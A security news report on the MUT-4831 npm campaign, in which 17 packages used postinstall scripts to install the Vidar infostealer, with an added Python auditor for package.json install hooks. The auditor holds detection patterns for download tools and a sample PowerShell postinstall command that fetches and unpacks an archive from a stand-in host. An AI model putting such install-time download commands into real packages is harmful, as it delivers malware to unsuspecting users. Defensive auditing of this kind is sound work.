Researchers at Datadog Security Research have uncovered a major supply-chain compromise in the npm ecosystem involving 17 malicious packages (across 23 releases) that secretly installed Vidar infostealer malware on Windows systems. The campaign, attributed to a threat activity cluster tracked as MUT-4831, marks the first known instance of Vidar being distributed via npm packages.
The threat actors behind MUT-4831 employed classic social engineering tactics, creating packages that appeared functional and legitimate. These malicious libraries were published by two recently created npm accounts, aartje and saliii229911, and remained active on the registry for approximately two weeks.
The packages deceptively posed as:
- Telegram bot helper packages.
- Icon libraries.
- Forks of established projects like Cursor and React.
One representative package, custom-tg-bot-plan, presented itself as a “Node.js Telegram Bot API – Custom Fork”. At the time of detection, the packages had been downloaded at least 2,240 times.
The malicious packages leveraged an exceedingly common vector: the postinstall script. Datadog’s static analyzer, GuardDog, flagged the presence of npm-install-script, indicating that a script was automatically running upon installation.
The attack chain, typical of a two-stage malware deployment, is executed by the dependencies.js script:
- Download: The script downloads an encrypted ZIP archive from a hardcoded URL on the bullethost[.]cloud domain.
- Unpack: It then decrypts and extracts the archive using a hardcoded password.
- Execute: Finally, it executes a PE binary named bridle.exe from the extracted archive.
“This downloader pattern is one we observe routinely among malicious npm packages, in which a slim first-stage malware that ships with the package loads a second, more overtly malicious stage.”
In a variation, a small number of packages used an embedded PowerShell script in the package.json to handle the download step, possibly “diversifying implementations… in terms of surviving detection.”
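The two install-time variants described above (a postinstall hook running a bundled downloader script, and an inline PowerShell command in package.json) can be surfaced before `npm install` ever runs them by auditing the manifest's lifecycle scripts. The following is an added defensive example, not Datadog's or GuardDog's code; the package names, URL and heuristic indicators are constructed for illustration.

```python
"""Audit an npm package.json for install-time lifecycle hooks.

Constructed example: flags the pattern seen in the MUT-4831 campaign
(postinstall running a bundled .js downloader, or an embedded PowerShell
command) so a reviewer can look at it before `npm install` executes it.
"""
import json
import re

# npm lifecycle hooks that run automatically during `npm install`
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Indicators worth a human look (constructed heuristics, not GuardDog's rules)
INDICATORS = {
    "runs_bundled_js": re.compile(r"\bnode\s+\S+\.c?js\b"),
    "powershell": re.compile(r"\bpowershell(\.exe)?\b|\bpwsh\b", re.I),
    "downloader": re.compile(r"curl\b|wget\b|Invoke-WebRequest|DownloadFile", re.I),
    "archive_unpack": re.compile(r"\bunzip\b|Expand-Archive|\b7z\b", re.I),
    "exec_binary": re.compile(r"\.exe\b|Start-Process", re.I),
}


def audit_package_json(text: str) -> list:
    """Return one finding per install-time hook, with the indicators it matches."""
    manifest = json.loads(text)
    scripts = manifest.get("scripts", {})
    findings = []
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
        findings.append({"hook": hook, "command": cmd, "indicators": hits})
    return findings


# Constructed manifests modelled on the two variants described in the article
VARIANT_DOWNLOADER_JS = json.dumps({
    "name": "example-tg-bot-helper",  # constructed name, not a real package
    "version": "1.0.0",
    "scripts": {"postinstall": "node dependencies.js", "test": "jest"},
})
VARIANT_INLINE_POWERSHELL = json.dumps({
    "name": "example-icon-lib",  # constructed name, not a real package
    "version": "1.0.0",
    "scripts": {"postinstall": 'powershell -NoProfile -Command "Invoke-WebRequest '
                'https://example.invalid/stage.zip -OutFile stage.zip; Expand-Archive stage.zip"'},
})

if __name__ == "__main__":
    for manifest in (VARIANT_DOWNLOADER_JS, VARIANT_INLINE_POWERSHELL):
        for f in audit_package_json(manifest):
            print(f"{f['hook']}: {f['command']!r} -> {f['indicators']}")
```

Any hit is a prompt for review rather than a verdict; many legitimate packages use postinstall for native builds. Running installs with `npm install --ignore-scripts` (or `npm config set ignore-scripts true`) blocks this vector outright at the cost of breaking packages that genuinely need it.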
The second stage, the executable bridle.exe, was identified as a known variant of the Vidar infostealer malware. Vidar is designed to harvest a wide array of sensitive information from Windows systems:
- Browser credentials and cookies.
- Cryptocurrency wallets.
- System files.
This particular Vidar v2 variant, compiled from Go, uses an unusual technique for Command-and-Control (C2) infrastructure discovery. It calls home to hardcoded Telegram and Steam profiles, where the C2 domains are rotated and advertised in the accounts’ usernames and descriptions.
Upon successful data theft, Vidar packages the stolen information and exfiltrates it before deleting all traces of itself from the victim system.
This campaign is a potent reminder that “Threat actors have learned that npm provides a reliable initial access vector for delivering malware to unsuspecting downstream victims.”
The npm accounts associated with the campaign (aartje and saliii229911) have since been banned, and all malicious packages have been removed and replaced with security holding packages.